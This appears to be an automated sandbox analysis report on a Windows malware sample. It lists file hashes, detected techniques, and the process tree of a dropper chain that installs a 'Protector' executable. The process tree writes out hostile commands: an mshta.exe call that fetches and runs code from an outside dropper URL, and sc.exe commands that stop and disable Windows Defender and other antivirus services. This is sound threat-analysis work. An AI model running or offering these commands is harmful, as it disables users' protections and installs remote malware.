Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-07-2024 14:18

General

  • Target

    1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe

  • Size

    2.0MB

  • MD5

    1f9b619074e3ef7c19b296330e290dde

  • SHA1

    8342d1aa1cef5d5d10ee68a4dfcca4de12599502

  • SHA256

    a6e0ce289db711413ba5395a80e50a0ed95c3927448492d3ecde38506227c571

  • SHA512

    3ae7ef2c3181b44816e0cb7186b113c8e99d97e06a56d7b4babf283cdc342f18273e39c66912c41bdbbabc62303bb8bb998cee9db0234847a521df46ae6784c6

  • SSDEEP

    49152:DKqoP5uG7LG6sjWmlwsg7IklBKZICcDIGXQvh9zK4tMy+iZKnkJeYuFEb:DQP5uGvC9bg7DlBqICchX8W1iZgkJLuo

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=vijldqbhas&14=1

Signatures

  • Disables service(s) 3 TTPs
  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4904
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe" -e -pm1it982889f9266
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:600
        • C:\Users\Admin\AppData\Roaming\Protector-gjse.exe
          C:\Users\Admin\AppData\Roaming\Protector-gjse.exe
          4⤵
          • UAC bypass
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2844
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=vijldqbhas&14=1"
            5⤵
              PID:1616
            • C:\Windows\SysWOW64\sc.exe
              sc stop WinDefend
              5⤵
              • Launches sc.exe
              PID:2680
            • C:\Windows\SysWOW64\sc.exe
              sc config WinDefend start= disabled
              5⤵
              • Launches sc.exe
              PID:4344
            • C:\Windows\SysWOW64\sc.exe
              sc stop msmpsvc
              5⤵
              • Launches sc.exe
              PID:3896
            • C:\Windows\SysWOW64\sc.exe
              sc config msmpsvc start= disabled
              5⤵
              • Launches sc.exe
              PID:2960
            • C:\Windows\SysWOW64\sc.exe
              sc config ekrn start= disabled
              5⤵
              • Launches sc.exe
              PID:1692
            • C:\Windows\SysWOW64\sc.exe
              sc stop AntiVirService
              5⤵
              • Launches sc.exe
              PID:4984
            • C:\Windows\SysWOW64\sc.exe
              sc config AntiVirService start= disabled
              5⤵
              • Launches sc.exe
              PID:2968
            • C:\Windows\SysWOW64\sc.exe
              sc config AntiVirSchedulerService start= disabled
              5⤵
              • Launches sc.exe
              PID:3652
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\13TU7H~1.EXE" >> NUL
            4⤵
              PID:3576

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe

        Filesize

        2.0MB

        MD5

        567b2b37131635dea665bca13f4999d8

        SHA1

        1585ba49f012492c92f69ff46a752e8f4ce26322

        SHA256

        bd887a86e92b97eea034dc5818aa270ff66b8a7571afa47d78a9390ec8f9d7af

        SHA512

        95e60c1275de2fbc8cd4a869562e4cd38b9d22f7ebdb2fbc80a72726d167f836aeb35913e39565da1dc7d2451f954ef1b0c8dc0c2c0aba40ffab4e5411b67fae

      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe

        Filesize

        1.9MB

        MD5

        173a6177bb4785ddc32232299f49f6de

        SHA1

        a2c834008094e2dfb0404127fb787b6e6f13329c

        SHA256

        a283ff54ea50d76f1f5881584d3129b6d80457880244d532d0f81ac05cccc3af

        SHA512

        d39ded0bc757b94f3635648ed61c882b81df4fc64f4b895b50cd1811329c4737ff7d439b7cfbec4a29d3d426ac40d7d8891f7005f29f9dc91b2c558e7bd1757c

      • memory/600-18-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/600-28-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-36-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-38-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-39-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-40-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-41-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-42-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-44-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-45-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-46-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-47-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB

      • memory/2844-49-0x0000000000400000-0x0000000000805000-memory.dmp

        Filesize

        4.0MB